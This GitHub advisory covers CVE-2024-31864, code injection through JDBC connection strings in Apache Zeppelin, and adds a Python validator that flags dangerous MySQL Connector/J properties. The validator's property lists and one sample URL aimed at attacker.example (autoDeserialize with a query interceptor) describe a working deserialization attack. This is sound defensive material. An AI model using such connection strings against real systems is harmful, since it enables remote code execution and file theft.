CVE-2024-31864 – org.apache.zeppelin:zeppelin-jdbc
Package
Manager: maven
Name: org.apache.zeppelin:zeppelin-jdbc
Vulnerable Version: >=0 <0.11.1
Severity
Level: Critical
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
EPSS: 0.0116 (percentile 0.77784)
Details
Apache Zeppelin remote code execution by adding a malicious JDBC connection string. Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Zeppelin: an attacker can inject sensitive configuration or malicious code through the JDBC connection string used when connecting to a MySQL database via the JDBC driver, because the zeppelin-jdbc interpreter passed the supplied connection string to the driver without restricting the driver properties it could carry. This issue affects Apache Zeppelin before 0.11.1. Users are recommended to upgrade to version 0.11.1, which fixes the issue; until then, treat any JDBC interpreter setting that points at a host you do not control, or that carries driver properties you did not add, as suspect.
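The advisory does not spell out which driver properties are dangerous, so the following is an added illustration of the check a reviewer or interpreter wrapper would want, not Apache Zeppelin's own code and not the 0.11.1 fix. It parses a MySQL JDBC connection string (both the ordinary `?key=value` query form and Connector/J's `address=(key=value)` host form) and flags client-side properties that let a hostile MySQL server read files from, or run deserialization gadgets inside, the JVM that holds the connection. The property names are taken from the MySQL Connector/J documentation as the author understands it and the sample URLs are constructed; treat both lists as assumptions to verify against the driver version you ship.

```python
"""Flag MySQL Connector/J connection properties that hand a malicious server
file-read or code-execution capability on the JDBC client.

Added illustration for this advisory; not Apache Zeppelin's code. The property
lists below are assumptions drawn from Connector/J documentation, not from the
advisory text.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Boolean switches a hostile server can abuse once enabled (assumed list).
RISKY_BOOLEANS = {
    "allowloadlocalinfile",        # server may request arbitrary client files via LOAD DATA LOCAL
    "allowloadlocalinfileinpath",  # same, limited to one directory chosen by the URL author
    "allowurlinlocalinfile",       # LOAD DATA LOCAL may name a URL, so the client fetches it
    "autodeserialize",             # BLOB columns go through ObjectInputStream: gadget-chain RCE
}

# Properties whose value is a Java class name loaded inside the client JVM (assumed list).
CLASS_LOADING = {
    "queryinterceptors", "statementinterceptors", "exceptioninterceptors",
    "connectionlifecycleinterceptors", "propertiestransform", "socketfactory",
    "authenticationplugins", "defaultauthenticationplugin",
}

# Values this validator treats as "switch off"; anything else (true, yes, 1, TRUE...) is "on".
FALSE_VALUES = {"", "false", "no", "0"}

# Connector/J host syntax: address=(host=h)(port=3306)(key=value)
_PAREN_KV = re.compile(r"\(([^()=]+)=([^()]*)\)")


def extract_properties(url: str) -> list[tuple[str, str]]:
    """Return (key, value) pairs from the query string and from the address=(...)
    host form. Keys are lower-cased so the check cannot be bypassed by case
    variation; parse_qsl also undoes percent-encoding of key names."""
    if not url.lower().startswith("jdbc:"):
        raise ValueError("not a JDBC URL")
    parts = urlsplit(url[len("jdbc:"):])
    pairs = [(k.strip().lower(), v.strip())
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    for k, v in _PAREN_KV.findall(parts.netloc):
        pairs.append((k.strip().lower(), v.strip()))
    return pairs


def check_jdbc_url(url: str) -> list[str]:
    """Return human-readable findings; an empty list means no risky property was seen."""
    findings = []
    for key, value in extract_properties(url):
        if key in RISKY_BOOLEANS and value.lower() not in FALSE_VALUES:
            findings.append(f"{key}={value} enables a server-driven file read or deserialization")
        elif key in CLASS_LOADING:
            findings.append(f"{key}={value} loads an arbitrary class into the client JVM")
    return findings


def is_safe_jdbc_url(url: str) -> bool:
    """True when the connection string carries none of the flagged properties."""
    return not check_jdbc_url(url)


if __name__ == "__main__":
    # Constructed sample connection strings, not captured from any real deployment.
    samples = [
        "jdbc:mysql://db.internal:3306/analytics?useSSL=true&serverTimezone=UTC",
        "jdbc:mysql://attacker.example:3306/db?autoDeserialize=true"
        "&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
        "jdbc:mysql://h/db?allowLoadLocalInfile=false",
        "jdbc:mysql://address=(host=h)(port=3306)(allowLoadLocalInfile=true)/db",
    ]
    for s in samples:
        verdict = check_jdbc_url(s)
        print("OK    " if not verdict else "REJECT", s)
        for f in verdict:
            print("        -", f)
```

The validator rejects on the presence of class-loading properties regardless of value, but allows the boolean switches when explicitly set to an "off" value, so a legitimate `allowLoadLocalInfile=false` passes. It only inspects the connection string; if the interpreter also merges a separate properties map into the driver, run the same key check over that map.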
Metadata
Created: 2024-04-09T18:30:22Z
Modified: 2024-05-02T18:59:28Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-66j8-c83m-gj5f/GHSA-66j8-c83m-gj5f.json
CWE IDs: CWE-94 (Improper Control of Generation of Code, 'Code Injection')
Alternative ID: GHSA-66j8-c83m-gj5f
Finding: F422
Auto approve: 1